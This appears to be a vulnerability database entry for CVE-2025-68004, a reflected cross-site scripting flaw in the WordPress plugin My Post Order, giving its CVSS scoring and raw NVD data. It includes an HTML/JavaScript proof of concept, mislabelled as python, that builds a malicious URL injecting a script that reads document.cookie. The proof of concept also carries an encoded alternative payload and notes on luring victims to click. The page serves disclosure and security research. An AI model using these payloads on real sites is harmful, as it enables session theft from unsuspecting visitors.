Security Vulnerability Report
中文
CVE-2025-68004 CVSS 7.1 HIGH

CVE-2025-68004

Published: 2026-01-22 17:16:07
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kapil Chugh My Post Order my-posts-order allows Reflected XSS.This issue affects My Post Order: from n/a through <= 1.2.1.1.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

My Post Order <= 1.2.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-68004 PoC: Reflected XSS in My Post Order Plugin --> <!-- Target: WordPress site with My Post Order plugin <= 1.2.1.1 --> <!-- Step 1: Construct malicious URL with XSS payload --> <!-- Replace 'your-site.com' with target WordPress site domain --> <!-- Replace XSS_PAYLOAD with your desired JavaScript code --> <!DOCTYPE html> <html> <head> <title>CVE-2025-68004 PoC</title> </head> <body> <h2>CVE-2025-68004 Reflected XSS PoC</h2> <p>Target: My Post Order WordPress Plugin <= 1.2.1.1</p> <script> // Generate malicious URL const targetUrl = 'https://your-site.com'; const xssPayload = '<script>alert(document.cookie)<\/script>'; const maliciousUrl = targetUrl + '/?page_id=YOUR_PAGE_ID&my_post_order=' + encodeURIComponent(xssPayload); // Display the malicious URL document.write('<p>Malicious URL: <a href="' + maliciousUrl + '" target="_blank">' + maliciousUrl + '</a></p>'); // Simulate social engineering message console.log('Attacker would send this URL to victim via email, chat, etc.'); console.log('When victim clicks, XSS payload executes in their browser'); </script> <!-- Alternative PoC: Direct URL --> <!-- https://target-site.com/?page_id=XX&my_post_order=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E --> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68004", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:06.723", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kapil Chugh My Post Order my-posts-order allows Reflected XSS.This issue affects My Post Order: from n/a through <= 1.2.1.1."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') vulnerabilidad en Kapil Chugh My Post Order my-posts-order permite XSS Reflejado. Este problema afecta a My Post Order: desde n/a hasta &lt;= 1.2.1.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/my-posts-order/vulnerability/wordpress-my-post-order-plugin-1-2-1-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}